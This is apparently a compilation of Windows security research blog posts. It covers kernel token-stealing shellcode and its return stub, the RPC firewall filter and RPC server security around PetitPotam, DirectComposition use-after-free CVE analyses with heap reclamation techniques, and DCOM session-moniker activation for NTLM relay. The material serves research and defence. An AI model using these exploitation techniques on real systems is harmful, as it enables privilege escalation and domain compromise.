After converting the shellcode to ascii-hex and pasting it to shellnoob input (opcode_to_asm), this is what we get:

Our shellcode, executing in kernel mode, finds the SYSTEM process and then copies its access token over the token of the exploit process. This way the exploit process becomes NT AUTHORITY/SYSTEM. Have a look into to see descriptions of all individual assembly instructions in this payload. Pay attention to the fact that while shellnoob output presents assembly in AT&T syntax, Payloads.c contain assembly in Intel syntax (this is why it's worth to know both,

This shellcode, however, requires one more adjustment.

Clean return

Now, the problem is, if we simply use this shellcode to exploit this particular vulnerability, the kernel will crash right after modifying relevant access token. The reason for this is the return process and messed up stack. The problem - and the solution - are already well described at I myself had to get my head around the process my own way to fully understand it and confirm (instead of just blindly running it and trusting it would work), that in fact the return stub provided by klue is going the correct one:

mov 0x78c(%esp), %edi
mov 0x790(%esp), %esi
mov 0x794(%esp), %ebx
add $0x9b8, %esp
pop %ebp
ret $0x8

So, the following return stub

had to be replaced. Again, I used shellnoob to obtain the opcodes:

Basically the entire problem boils down to the fact that we need to return to somewhere - and when we do, the stack needs to be aligned the same way as it would normally be during normal execution.

The entire process of aligning the stuck boils down to three things. First, identifying, where we will be returning - and taking notice of what the stack and the registers look like when return to that location is made normally. Second, setting a breakpoint in our shellcode, to again take notice of what the stack and the registers look like when our shellcode executes (it's convenient to use hardcoded software breakpoint in the shellcode itself - just append it with 0xcc (int3) instead of the return stub). Third, comparing the state of the registers and the stack between the two stages, finding where the register values to restore are in memory, restore them, then finally adjust the last one of them (ESP) and make the return.


Source code can be found here.

How the Windows Firewall RPC Filter Works

By: tiraniddo
22 August 2021 at 05:32

I did promise that I'd put out a blog post on how the Windows RPC filter works. Now that I released my more general blog post on the Windows firewall I thought I'd come back to a shorter post about the RPC filter itself. If you don't know the context, the Windows firewall has the ability to restrict access to RPC interfaces. This is interesting due to the renewed interest in all things RPC, especially the PetitPotam trick. For example you can block any access to the EFSRPC interfaces using the following script which you run with the netsh command.

add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e
add filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=df1941c5-fe89-4e79-bf10-463657acf44d
add filter

This script adds two rules which will block any calls on the RPC interfaces with UUIDs of c681d488-d850-11d0-8c52-00c04fd90f7e and df1941c5-fe89-4e79-bf10-463657acf44d. These correspond to the two EFSRPC interfaces.

How does this work within the context of the firewall? Does the kernel components of the Windows Filtering Platform have a builtin RPC protocol parser to block the connection? That'd be far too complex, instead everything is done in user-mode by some special layers. If you use NtObjectManager's firewall Get-FwLayer command you can check for layers registered to run in user-mode by filtering on the IsUser property.

PS> Get-FwLayer | Where-Object IsUser
KeyName                      Name
-------                      ----
FWPM_LAYER_KM_AUTHORIZATION  Keying Module Authorization Layer
FWPM_LAYER_IKEEXT_V4         IKE v4 Layer
FWPM_LAYER_IPSEC_V6          IPsec v6 Layer
FWPM_LAYER_IPSEC_V4          IPsec v4 Layer
FWPM_LAYER_IKEEXT_V6         IKE v6 Layer
FWPM_LAYER_RPC_UM            RPC UM Layer
FWPM_LAYER_RPC_PROXY_IF      RPC Proxy Interface Layer

In the output we can see 5 layers with RPC in the name of the layer. 
  • FWPM_LAYER_RPC_EP_ADD - Filter new endpoints created by a process.
  • FWPM_LAYER_RPC_EPMAP - Filter access to endpoint mapper information.
  • FWPM_LAYER_RPC_PROXY_CONN - Filter connections to the RPC proxy.
  • FWPM_LAYER_RPC_PROXY_IF - Filter interface calls through an RPC proxy.
  • FWPM_LAYER_RPC_UM - Filter interface calls to an RPC server
Each of these layers is potentially interesting, and you can add rules through netsh for all of them. But we'll just focus on how the FWPM_LAYER_RPC_UM layer works as that's the one the script introduced at the start works with. If you run the following command after adding the RPC filter rules you can view the newly created rules:

PS> Get-FwFilter -LayerKey FWPM_LAYER_RPC_UM -Sorted | Format-FwFilter
Name       : RPCFilter
Action Type: Block
Key        : d4354417-02fa-11ec-95da-00155d010a06
Id         : 78253
Description: RPC Filter
Layer      : FWPM_LAYER_RPC_UM
Flags      : Persistent
Weight     : 567453553048682496
Conditions :
FieldKeyName               MatchType Value
------------               --------- -----
FWPM_CONDITION_RPC_IF_UUID Equal     df1941c5-fe89-4e79-bf10-463657acf44d

Name       : RPCFilter
Action Type: Block
Key        : d4354416-02fa-11ec-95da-00155d010a06
Id         : 78252
Description: RPC Filter
Layer      : FWPM_LAYER_RPC_UM
Flags      : Persistent
Weight     : 567453553048682496
Conditions :
FieldKeyName               MatchType Value
------------               --------- -----
FWPM_CONDITION_RPC_IF_UUID Equal     c681d488-d850-11d0-8c52-00c04fd90f7e

If you're read my general blog post the output should made some sense. The FWPM_CONDITION_RPC_IF_UUID condition key is used to specify the UUID for the interface to match on. The FWPM_LAYER_RPC_UM has many possible fields to filter on, which you can query by inspecting the layer object's Fields property.

PS> (Get-FwLayer -Key FWPM_LAYER_RPC_UM).Fields

KeyName                              Type      DataType
-------                              ----      --------
FWPM_CONDITION_RPC_IF_UUID           RawData   ByteArray16
FWPM_CONDITION_RPC_IF_FLAG           RawData   UInt32
FWPM_CONDITION_DCOM_APP_ID           RawData   ByteArray16
FWPM_CONDITION_IMAGE_NAME            RawData   ByteBlob
FWPM_CONDITION_PIPE                  RawData   ByteBlob

There's quite a few potential configuration options for the filter. You can filter based on the remote user token that's authenticated to the interface. Or you can filters based on the authentication level and type. This could allow you to protect an RPC interface so that all callers have to use Kerberos with at RPC_C_AUTHN_LEVEL_PKT_PRIVACY level. 

Anyway, configuring it is less important to us, you probably want to know how it works, as the first step to trying to find a way to bypass it is to know where this filter layer is processed (note, I've not found a bypass, but you never know). 

Perhaps unsurprisingly due to the complexity of the RPC protocol the filtering is implemented within the RPC server process through the RpcRtRemote extension DLL. Except for RPCSS this DLL isn't loaded by default. Instead it's only loaded if there exists a value for the WNF_RPCF_FWMAN_RUNNING WNF state. The following shows the state after adding the two RPC filter rules with netsh.

PS> $wnf = Get-NtWnf -Name 'WNF_RPCF_FWMAN_RUNNING'
PS> $wnf.QueryStateData()

Data ChangeStamp
---- -----------
{}             2

The RPC runtime sets up a subscription to load the DLL if the WNF value is ever changed. Once loaded the RPC runtime will register all current interfaces to check the firewall. The filter rules are checked when a call is made to the interface during the normal processing of the security callback. The runtime will invoke the FwFilter function inside RpcRtRemote, passing all the details about the firewall interface call. The filter call is only made for DCE/RPC protocols, so not ALPC. It also will only be called if the caller is remote. This is always the case if the call comes via TCP, but for named pipes it will only be called if the pipe was opened via SMB.

Here's where we can finally determine how the RPC filter is processed. The FwFilter function builds a list of firewall values corresponding to the list of fields for the FWPM_LAYER_RPC_UM layer and passes them to the FwpsClassifyUser0 API along with the numeric ID of the layer. This API will enumerate all filters for the layer and apply the condition checks returning the classification, e.g. block or permit. Based on this classification the RPC runtime can permit or refuse the call. 

In order for a filter to be accessible for classification the RPC server must have FWPM_ACTRL_OPEN access to the engine and FWPM_ACTRL_CLASSIFY access to the filter. By default the Everyone group has these access rights, however AppContainers and potentially other sandboxes do not. However, in general AppContainer processes don't tend to create privileged RPC servers, at least any which a remote attacker would find useful. You can check the access on various firewall objects using the Get-AccessibleFwObject command.

PS> $token = Get-NtToken -Filtered -Flags LuaToken
PS> Get-AccessibleFwObject -Token $token | Where-Object Name -eq RPCFilter

TokenId Access             Name
------- ------             ----
4ECF80  Classify|Open RPCFilter
4ECF80  Classify|Open RPCFilter

I hope this gives enough information for someone to dig into it further to see if there's any obvious bypass I missed. I'm sure there's probably some fun trick you could do to circumvent restrictions if you look hard enough :-)

How to secure a Windows RPC Server, and how not to.

By: tiraniddo
15 August 2021 at 02:04

The PetitPotam technique is still fresh in people's minds. While it's not directly an exploit it's a useful step to get unauthenticated NTLM from a privileged account to forward to something like the AD CS Web Enrollment service to compromise a Windows domain. Interestingly after Microsoft initially shrugged about fixing any of this they went and released a fix, although it seems to be insufficient at the time of writing.

While there's plenty of details about how to abuse the EFSRPC interface, there's little on why it's exploitable to begin with. I thought it'd be good to have a quick overview of how Windows RPC interfaces are secured and then by extension why it's possible to use the EFSRPC interface unauthenticated. 

Caveat: No doubt I might be missing other security checks in RPC, these are the main ones I know about :-)

RPC Server Security

The server security of RPC is one which has seemingly built up over time. Therefore there's various ways of doing it, and some ways are better than others. There are basically three approaches, which can be mixed and matched:
  1. Securing the endpoint
  2. Securing the interface
  3. Ad-hoc security
Let's take each one in turn to determine how each one secures the RPC server.

Securing the Endpoint

You register the endpoint that the RPC server will listen on using the RpcServerUseProtseqEp API. This API takes the type of endpoint, such as ncalrpc (ALPC), ncacn_np (named pipe) or ncacn_ip_tcp (TCP socket) and creates the listening endpoint. For example the following would create a named pipe endpoint called DEMO.


The final parameter is optional but represents a security descriptor (SD) you assign to the endpoint to limit who has access. This can only be enforced on ALPC and named pipes as something like a TCP socket doesn't (technically) have an access check when it's connected to. If you don't specify an SD then a default is assigned. For a named pipe the default DACL grants the following uses write access:
  • Everyone
  • SELF
Where SELF is the creating user's SID. This is a pretty permissive SD. One interesting thing about RPC endpoints is they are multiplexed. You don't explicit associate an endpoint with the RPC interface you want to access. Instead you can connect to any endpoint that the process has created. The end result is that if there's a less secure endpoint in the same process it might be possible to access an interface using the least secure one. In general this makes relying on endpoint security risky, especially in processes which run multiple services, such as LSASS. In any case if you want to use a TCP endpoint you can't rely on the endpoint security as it doesn't exist.

Securing the Interface

The next way of securing the RPC server is to secure the interface itself. You register the interface structure that was generated by MIDL using one of the following APIs:
Each has a varying number of parameters some of which determine the security of the interface. The latest APIs are RpcServerRegisterIf3 and RpcServerInterfaceGroupCreate which were introduced in Windows 8. The latter is just a way of registering multiple interfaces in one call so we'll just focus on the former. The RpcServerRegisterIf3 has three parameters which affect security, SecurityDescriptor, IfCallback and Flags. 

The SecurityDescriptor parameter is easiest to explain. It assigns an SD to the interface, when a call is made on that interface then the caller's token is checked against the SD and access is only granted if the check passes. If no SD is specified a default is used which grants the following SIDs access (assuming a non-AppContainer process)
  • Everyone
  • BUILTIN\Administrators
  • SELF
The token to use for the access check is based either on the client's authentication (we'll discuss this later) or the authentication for the endpoint. ALPC and named pipe are authenticated transports, where as TCP is not. When using an unauthenticated transport the access check will be against the anonymous token. This means if the SD does not contain an allow ACE for ANONYMOUS LOGON it will be blocked.

Note, due to a quirk of the access check process the RPC runtime grants access if the caller has any access granted, not a specific access right. What this means is that if the caller is considered the owner, which is normally set to the creating user SID they might only be granted READ_CONTROL but that's sufficient to bypass the check. This could also be useful if the caller has SeTakeOwnershipPrivilege or similar as it'd be possible to generically bypass the interface SD check (though of course that privilege is dangerous in its own right).

The second parameter, IfCallback, takes an RPC_IF_CALLBACK function pointer. This callback function will be invoked when a call is made to the interface, although it will be called after the SD is checked. If the callback function returns RPC_S_OK then the call will be allowed, anything else will deny the call. The callback gets a pointer to the interface and the binding handle and can do various checks to determine if the caller is allowed to access the interface.

A common check is for the client's authentication level. The client can specify the level to use when connecting to the server using the RpcBindingSetAuthInfo API however the server can't directly specify the minimum authentication level it accepts. Instead the callback can use the RpcBindingInqAuthClient API to determine what the client used and grant or deny access based on that. The authentication levels we typically care about are as follows:
  • RPC_C_AUTHN_LEVEL_NONE - No authentication
  • RPC_C_AUTHN_LEVEL_CONNECT - Authentication at connect time, but not per-call.
  • RPC_C_AUTHN_LEVEL_PKT_INTEGRITY - Authentication at connect time, each call has integrity protection.
  • RPC_C_AUTHN_LEVEL_PKT_PRIVACY - Authentication at connect time, each call is encrypted and has integrity protection.
The authentication is implemented using a defined authentication service, such as NTLM or Kerberos, though that doesn't really matter for our purposes. Also note that this is only used for RPC services available over remote protocols such as named pipes or TCP. If the RPC server listens on ALPC then it's assumed to always be RPC_C_AUTHN_LEVEL_PKT_PRIVACY. Other checks the server could do would be the protocol sequence the client used, this would allow rejecting access via TCP but permit named pipes.

The final parameter is the flags. The flag most obviously related to security is RPC_IF_ALLOW_SECURE_ONLY (0x8). This blocks access to the interface if the current authentication level is RPC_C_AUTHN_LEVEL_NONE. This means the caller must be able to authenticate to the server using one of the permitted authentication services. It's not sufficient to use a NULL session, at least on any modern version of Windows. Of course this doesn't say much about who has authenticated, a server might still want to check the caller's identity.

The other important flag is RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH (0x10). If the server specifies a security callback and this flag is not set then any unauthenticated client will be automatically rejected. 

If this wasn't complex enough there's at least one other related setting which applies system wide which will determine what type of clients can access what RPC server. The Restrict Unauthenticated RPC Clients group policy. By default this is set to None if the RPC server is running on a server SKU of Windows and Authenticated on a client SKU. 

In general what this policy does is limit whether a client can use an unauthenticated transport such as TCP when they haven't also separately authenticated to an valid authentication level. When set to None RPC servers can be accessed via an unauthenticated transport subject to any other restrictions the interface is registered with. If set to Authenticated then calls over unauthenticated transports are rejected, unless the RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH flag is set for the interface or the client has authenticated separately. There's a third option, Authenticated without exceptions, which will block the call in all circumstances if the caller isn't using an authenticated transport. 

Ad-hoc Security

The final types of checks are basically anything else the server does to verify the caller. A common approach would be to perform a check within a specific function on the interface. For example, a server could generally allow unauthenticated clients, except when calling a method to read a important secret value. At that point is could insert an authentication level check to ensure the client has authenticated at RPC_C_AUTHN_LEVEL_PKT_PRIVACY so that the secret will be encrypted when returned to the client. 

Ultimately you'll have to check each function you're interested in to determine what, if any, security checks are in place. As with all ad-hoc checks it's possible that there's a logic bug in there which can be exploited to bypass the security restrictions.

Digging into EFSRPC

Okay, that covers the basics of how an RPC server is secured. Let's look at the specific example of the EFSRPC server abused by PetitPotam. Oddly there's two implementation of the RPC server, one in efslsaext.dll which the interface UUID of c681d488-d850-11d0-8c52-00c04fd90f7e and one in efssvc.dll with the interface UUID of df1941c5-fe89-4e79-bf10-463657acf44d. The one in efslsaext.dll is the one which is accessible unauthenticated, so let's start there. We'll go through the three approaches to securing the server to determine what it's doing.

First, the server does not register any of its own protocol sequences, with SDs or not. What this means is who can call the RPC server is dependent on what other endpoints have been registered by the hosting process, which in this case is LSASS.

Second, checking the for calls to one of the RPC server interface registration functions there's a single call to RpcServerRegisterIfEx in InitializeLsaExtension. This allows the caller to specify the security callback but not an SD. However in this case it doesn't specify any security callback. The InitializeLsaExtension function also does not specify either of the two security flags (it sets RPC_IF_AUTOLISTEN which doesn't have any security impact). This means that in general any authenticated caller is permitted.

Finally, from an ad-hoc security perspective all the main functions such as EfsRpcOpenFileRaw call the function EfsRpcpValidateClientCall which looks something like the following (error check removed).

void EfsRpcpValidateClientCall(RPC_BINDING_HANDLE Binding, 
                               PBOOL ValidClient) {
  unsigned int ClientLocalFlag;
  I_RpcBindingIsClientLocal(NULL, &ClientLocalFlag);
  if (!ClientLocalFlag) {
    RPC_WSTR StringBinding;
    RpcBindingToStringBindingW(Binding, &StringBinding);
    RpcStringBindingParseW(StringBinding, NULL, &Protseq, 
                           NULL, NULL, NULL);
        Protseq, -1, L"ncacn_np", -1) == CSTR_EQUAL)
        *ValidClient = TRUE;

Basically the ValidClient parameter will only be set to TRUE if the caller used the named pipe transport and the pipe wasn't opened locally, i.e. the named pipe was opened over SMB. This is basically all the security that's being checked for. Therefore the only security that could be enforced is limited by who's allowed to connect to a suitable named pipe endpoint.

At a minimum LSASS registers the \pipe\lsass named pipe endpoint. When it's setup in lsasrv.dll a SD is defined for the named pipe that grants the following users access:
  • Everyone
  • BUILTIN\Administrators
Therefore in theory the anonymous user has access to the pipe, and as there are no other security checks in place in the interface definition. Now typically anonymous access isn't granted by default to named pipes via a NULL session, however domain controllers have an exception to this policy through the configured Network access: Named Pipes that can be accessed anonymously security option. For DCs this allows lsarpc, samr and netlogon pipes, which are all aliases for the lsass pipe, to be accessed anonymously.

You can now understand why the EFS RPC server is accessible anonymously on DCs. How does the other EFS RPC server block access? In that case it specifies an interface SD to limit access to only the Everyone group and BUILTIN\Administrators. By default the anonymous user isn't a member of Everyone (although it can be configured as such) therefore this blocks access even if you connected via the lsass pipe.

The Fix is In

What did Microsoft do to fix PetitPotam? One thing they definitely didn't do is change the interface registration or the named pipe endpoint security. Instead they added an additional ad-hoc check to EfsRpcOpenFileRaw. Specifically they added the following code:

DWORD AllowOpenRawDL = 0;
if (AllowOpenRawDL == 1 && 
    !EfsRpcpValidateClientCall(hBinding, &ValidClient) && ValidClient) {
  // Call allowed.

Basically unless the AllowOpenRawDL registry value is set to one then the call is blocked entirely regardless of the authenticating client. This seems to be a perfectly valid fix, except that EfsRpcOpenFileRaw isn't the only function usable to start an NTLM authentication session. As pointed out by Lee Christensen you can also do it via EfsRpcEncryptFileSrv or EfsRpcQueryUsersOnFile or others. Therefore as no other changes were put in place these other functions are accessible just as unauthenticated as the original.

It's really unclear how Microsoft didn't see this, but I guess they might have been blinded by them actually fixing something which they were adamant was a configuration issue that sysadmins had to deal with. 

UPDATE 2021/08/17: It's worth noting that while you can access the other functions unauthenticated it seems any network access is done using the "authenticated" caller, i.e. the ANONYMOUS user so it's probably not that useful. The point of this blog is not about abusing EFSRPC but why it's abusable :-)

Anyway I hope that explains why PetitPotam works unauthenticated (props to topotam77 for the find) and might give you some insight into how you can determine what RPC servers might be accessible going forward. 

Analysis of DirectComposition Binding and Tracker object vulnerability

15 August 2021 at 00:00

DirectComposition introduction

Microsoft DirectComposition is a Windows component that enables high-performance bitmap composition with transforms, effects, and animations. Application developers can use the DirectComposition API to create visually engaging user interfaces that feature rich and fluid animated transitions from one visual to another.[1]

DirectComposition API provides COM interface via dcomp.dll, calls win32kbase.sys through win32u.dll export function, and finally sends data to client program dwm.exe (Desktop Window Manager) through ALPC to complete the graphics rendering operation:

win32u.dll (Windows 10 1909) provides the following export functions to handle DirectComposition API:

The three functions related to trigger vulnerability are: NtDCompositionCreateChannel,NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel:
(1) NtDCompositionCreateChannel creates a channel to communicate with the kernel:

typedef NTSTATUS(*pNtDCompositionCreateChannel)(
	OUT PHANDLE hChannel,
	IN OUT PSIZE_T pSectionSize,
	OUT PVOID* pMappedAddress

(2) NtDCompositionProcessChannelBatchBuffer batches multiple commands:

typedef NTSTATUS(*pNtDCompositionProcessChannelBatchBuffer)(
    IN HANDLE hChannel,
    IN DWORD dwArgStart,
    OUT PDWORD pOutArg1,
    OUT PDWORD pOutArg2

The batched commands are stored in the pMappedAddress memory returned by NtDCompositionCreateChannel. The command list is as follows:


The commands related to trigger vulnerability are: CreateResource, SetResourceBufferProperty, ReleaseResource. The data structure of different commands is different:

(3) NtDCompositionCommitChannel serializes batch commands and sends them to dwm.exe for rendering through ALPC:

typedef NTSTATUS(*pNtDCompositionCommitChannel)(
	IN HANDLE hChannel,
	IN DWORD flag,

CInteractionTrackerBindingManagerMarshaler::SetBufferProperty process analysis

First use CreateResource command to create CInteractionTrackerBindingManagerMarshaler resource (ResourceType = 0x59, hereinafter referred to as “Binding”) and CInteractionTrackerMarshaler resource (ResourceType = 0x58, hereinafter referred to as “Tracker”).
Then call the SetResourceBufferProperty command to set the Tracker object to the Binding object’s BufferProperty.
This process is handled by the function CInteractionTrackerBindingManagerMarshaler::SetBufferProperty, which main process is as follows:

The key steps are as follows:
(1) Check the input buffer subcmd == 0 && bufsize == 0xc
(2) Get Tracker objects tracker1 and tracker2 from channel-> resource_list (+0x38) according to the resourceId in the input buffer
(3) Check whether the types of tracker1 and tracker2 are CInteractionTrackerMarshaler (0x58)
(4) If binding->entry_count (+0x50) > 0, find the matched TrackerEntry from binding->tracker_list (+0x38) according to the handleID of tracker1 and tracker2, then update TrackerEntry->entry_id to the new_entry_id from the input buffer
(5) Otherwise, create a new TrackerEntry structure. If tracker1->binding == NULL || tracker2->binding == NULL, update their binding objects

After SetBufferProperty, a reference relationship between the binding object and the tracker object is as follows:

When use ReleaseResource command to release the Tracker object, the CInteractionTrackerMarshaler::ReleaseAllReferencescalled function is called. ReleaseAllReferences checks whether the tracker object has a binding object internally:

If it has:
(1) Call RemoveTrackerBindings. In RemoveTrackerBindings, TrackerEntry.entry_id is set to 0 if the resourceID in tracker_list is equal to the resourceID of the freed tracker. Then call CleanUpListItemsPendingDeletion to delete the TrackerEntry which entry_id=0 in tracker_list:

(2) Call ReleaseResource to set refcnt of the binding object minus 1.

(3) tracker->binding (+0x190) = 0

According to the above process, the input command buffer to construct a normal SetBufferProperty process is as follows:

After SetBufferProperty, the memory layout of binding1 and tacker1, tracker2 objects is as follows:

After ReleaseResource tracker2, the memory layout of binding1, tacker1, and tracker2 objects is as follows:


Retrospective the process of CInteractionTrackerBindingManagerMarshaler::SetBufferProperty, when new_entry_id != 0, a new TrackerEntry structure will be created:

If tracker1 and tracker2 have been bound to binding1 already, after binding tracker1 and tracker2 to binding2, a new TrackerEntry structure will be created for binding2. Since tracker->binding != NULL at this time, tracker->binding will still save binding1 pointer and will not be updated to binding2 pointer. When the tracker is released, binding2->entry_list will retain the tracker’s dangling pointer.

Construct an input command buffer which can trigger the vulnerability as follows:

Memory layout after ReleaseResource tracker1:

It can be seen that after ReleaseResource tracker1, binding2->track_list[0] saves the dangling pointer of tracker1.


According to analyze the branch of ‘the new_entry_id != 0’, the root cause of CVE-2020-1381 is when creating TrackerEntry, it didn’t check the tracker object which has been bound to the binding object. The patch adds a check for tracker->binding when creating TrackerEntry:

CVE-2021-26900 is a bypass of the CVE-2020-1381 patch. The key point to bypass the patch is if the condition of tracker->binding==NULL can be constructed after the tracker is bound to the binding object.
The way to bypass is in the ‘update TrackerEntry’ branch:

When TrackerEntry->entry_id == 0, RemoveBindingManagerReferenceFromTrackerIfNecessary function is called. It checks if entry_id==0 internally, then call SetBindingManagerMarshaler to set tracker->binding=NULL:

Therefore, by setting entry_id=0 manually, the status of tracker->binding == NULL can be obtained, which can be used to bypass the CVE-2020-1381 patch.

Construct an input command buffer which can trigger the vulnerability as follows:

After setting entry_id=0 manually, the memory layout of binding1 and tracker1:

At this time, binding1->TrackerEntry still saves the pointer of tracker1, but tracker1->binding = NULL. Memory layout after ReleaseResource tracker1: avatar

It can be seen that after ReleaseResource tracker1, binding1->track_list[0] saves the dangling pointer of tracker1.


Retrospective the method in CVE-2021-26900 which sets entry_id=0 manually to get tracker->binding == NULL status to bypass the CVE-2020-1381 patch and the process of CInteractionTrackerMarshaler::ReleaseAllReferences:ReleaseAllReferences which checks that if the tracker object has a binding object, and then deletes the corresponding TrackerEntry.

So when entry_id is set to 0 manually, tracker->binding will be set to NULL. When the tracker object is released via ReleaseResource command, the TrackerEntry saved by the binding object will not be deleted, then a dangling pointer of the tracker object will be obtained again.

Construct an input command buffer which can trigger the vulnerability as follows:

Memory layout after ReleaseResource tracker1:

It can be seen that after ReleaseResource tracker1, binding1->track_list[0] saves the dangling pointer of tracker1.


CVE-2021-33739 is different from the vulnerability in win32kbase.sys introduced in previous sections. It is a UAF vulnerability in dwmcore.dll of the dwm.exe process. The root cause is in ReleaseResource phase of CloseChannel. In CInteractionTrackerBindingManager::RemoveTrackerBinding function call, when the element Binding->hashmap(+0x40) is deleted, the hashmap is accessed directly without checking whether the Binding object is released, which causes the UAF vulnerability.

Construct an input command buffer which can trigger the vulnerability as follows:

According to the previous analysis, in the normal scenario of CInteractionTrackerBindingManagerMarshaler::SetBufferProperty function call, the Binding object should be bound with two different Tracker objects. However, if it is bound with the same Tracker object:

(1) Binding phase:
CInteractionTrackerBindingManager::ProcessSetTrackerBindingMode function is called to process binding opreation, which calls CInteractionTrackerBindingManager::AddOrUpdateTrackerBindings function internally to update Tracker->Binding (+0x278). When Tracker has already be bound with the current Binding object, the binding operation will not be repeated:

Therefore, if the same Tracker object is bound already, the Binding object will not be bound again, then the refcnt of the Binding object will only be increased by 1 finally: avatar

(2) Release phase:
After PreRender is finished, CComposition::CloseChannel will be called to close the Channel and release the Resource in the Resource HandleTable. The Binding object will be released firstly, at this time Binding->refcnt = 1:

Then the Tracker object will be released. CInteractionTrackerBindingManager::RemoveTrackerBindings will be called to release Tracker->Binding:

Three steps are included:
(1) Get the Tracker object from the TrackerEntry
(2) Erase the corresponding Tracker pointer from Binding->hashmap (+0x40)
(3) Remove Tracker->Binding (Binding->refcnt –) from the Tracker object

The key problem is: After completing the cleanup of the first Tracker object in TrackerEntry, the Binding object may be released already. When the second Tracker object is prepared to be cleared, because the Binding object has been released, the validity of the Binding object does not be checked before the Binding->hashmap is accessed again, which result in an access vialation exception:

Exploitation: Another way to occupy freed memory

For the kernel object UAF exploitation, according to the publicly available exploit samples[5], the Palette object is used to occupy the freed memory:

Use CInteractionTrackerBindingManagerMarshaler::EmitBoundTrackerMarshalerUpdateCommands function to access the placeholder objects:

The red box here is the virtual function CInteractionTrackerMarshaler::EmitUpdateCommands of tracker1, tracker2 object (vtable + 0x50). Because the freed Tracker object has been reused by Palette, the program execution flow hijacking is achieved by forging a virtual table and writing other function pointers to fake Tracker vtable+0x50.
The sample selects nt!SeSetAccessStateGenericMapping:

With the 16-byte write capability of nt!SeSetAccessStateGenericMapping, it modifies _KTHREAD->PreviousMode = 0 to inject shellcode into Winlogon process to complete the privilege escalation.

Another way to occupy freed memory

The exploitation of Palette object is relatively common, is there some object with user-mode controllable memory size in the DirectComposition component can be exploited?

The Binding object and Tracker object we discussed before are belonged to the Resource of DirectComposition. DirectComposition contains many Resource objects, which are created by DirectComposition::CApplicationChannel::CreateInternalResource:

Each Resource has a BufferProperty, which is set by SetResourceBufferProperty command. So our object is to find one Resource which can be used to allocate a user-mode controllable memory size through the SetResourceBufferProperty command. Through searching, I found CTableTransferEffectMarshaler::SetBufferProperty. The command format is as follows:

When subcmd==0, the bufferProperty is stored at CTableTransferEffectMarshaler+0x58. The size of the bufferProperty is set by the user-mode input bufferSize, and the content is copied from the user-mode input buffer:

Modify the original sample and use the propertyBuffer of CTableTransferEffectMarshaler to occupy freed memory:

By debugging, we can see that the propertyBuffer of CTableTransferEffectMarshaler occupies the freed memory successfully:

Finally, successful exploitation screenshot:



Standard Activating Yourself to Greatness

By: tiraniddo
27 April 2021 at 23:45

This week @decoder_it and @splinter_code disclosed a new way of abusing DCOM/RPC NTLM relay attacks to access remote servers. This relied on the fact that if you're in logged in as a user on session 0 (such as through PowerShell remoting) and you call CoGetInstanceFromIStorage the DCOM activator would create the object on the lowest interactive session rather than the session 0. Once an object is created the initial unmarshal of the IStorage object would happen in the context of the user authenticated to that session. If that happens to be a privileged user such as a Domain Administrator then the NTLM authentication could be relayed to a remote server and fun ensues.

The obvious problem with this attack is the requirement of being in session 0. Certainly it's possible a non-admin user might be allowed to authenticate to a system via PowerShell remoting but it'd be rarer than just being authenticated on a Terminal Server with multiple other users you could attack. It'd be nice if somehow you could pick the session that the object was created on.

Of course this already exists, you can use the session moniker to activate an object cross-session (other than to session 0 which is special). I've abused this feature multiple times for cross-session attacks, such as this, this or this. I've repeated told Microsoft they need to fix this activation route as it makes no sense than a non-administrator can do it. But my warnings have not been heeded. 

If you read the description of the session moniker you might notice a problem for us, it can't be combined with IStorage activation. The COM APIs only give us one or the other. However, if you poke around at the DCOM protocol documentation you'll notice that they are technically independent. The session activation is specified by setting the dwSessionId field in the SpecialPropertiesData activation property. And the marshalled IStorage object can be passed in the ifdStg field of the InstanceInfoData activation property. You package those activation properties up and send them to the IRemoteSCMActivator RemoteGetClassObject or RemoteCreateInstance methods. Of course it's possible this won't really work, but at least they are independent properties and could be mixed.

The problem with testing this out is implementing DCOM activation is ugly. The activation properties first need to be NDR marshalled in a blob. They then need to be packaged up correctly before it can be sent to the activator. Also the documentation is only for remote activation which is not we want, and there are some weird quirks of local activation I'm not going to go into. Is there any documented way to access the activator without doing all this?

No, sorry. There is an undocumented way though if you're interested? Sure? Okay good, let's carry on. The key with these sorts of challenges is to just look at how the system already does it. Specifically we can look at how session moniker is activating the object and maybe from that we'll be lucky and we can reuse that for our own purposes.

Where to start? If you read this MSDN article you can see you need to call MkParseDisplayNameEx to create parse the string into a moniker. But that's really a wrapper over MkParseDisplayName to provide URL moniker functionality which we don't care about. We'll just start at the MkParseDisplayName which is in OLE32.

HRESULT MkParseDisplayName(LPBC pbc, LPCOLESTR szUserName, 
      ULONG *pchEaten, LPMONIKER *ppmk) {
  HRESULT hr = FindLUAMoniker(pbc, szUserName, &pcchEaten, &ppmk);
  if (hr == MK_E_UNAVAILABLE) {
    hr = FindSessionMoniker(pbc, szUserName, &pcchEaten, &ppmk);
  // Parse rest of moniker.

Almost immediately we see a call to FindSessionMoniker, seems promising. Looking into that function we find what we need.

HRESULT FindSessionMoniker(LPBC pbc, LPCWSTR pszDisplayName, 
                           ULONG *pchEaten, LPMONIKER *ppmk) {
  DWORD dwSessionId = 0;
  BOOL bConsole = FALSE;
  if (wcsnicmp(pszDisplayName, L"Session:", 8))
    return MK_E_UNAVAILABLE;
if (!wcsnicmp(pszDisplayName + 8, L"Console", 7)) {
    dwConsole = TRUE;
    *pcbEaten = 15;
  } else {
    LPWSTR EndPtr;
    dwSessionId = wcstoul(pszDisplayName + 8, &End, 0);
    *pcbEaten = EndPtr - pszDisplayName;

  *ppmk = new CSessionMoniker(dwSessionId, bConsole);
  return S_OK;

This code parses out the session moniker data and then creates a new instance of the CSessionMoniker class. Of course this is not doing any activation yet. You don't use the session moniker in isolation, instead you're supposed to build a composite moniker with a new or class moniker. The MkParseDisplayName API will keep parsing the string (which is why pchEaten is updated) and combine each moniker it finds. Therefore, if you have the moniker display name:


The API will return a composite moniker consisting of the session moniker for session 3 and the class moniker for CLSID 0002DF02-0000-0000-C000-000000000046 which is the Browser Broker. The example code then calls BindToObject on the composite moniker, which first calls the right most moniker, which is the class moniker.

HRESULT CClassMoniker::BindToObject(LPBC pbc, 
  LPMONIKER pmkToLeft, REFIID riid, void **ppv) {
  if (pmkToLeft) {
      IClassActivator pClassActivator;
      pmkToLeft->BindToObject(pcb, nullptr, 
        IID_IClassActivator, &pClassActivator);
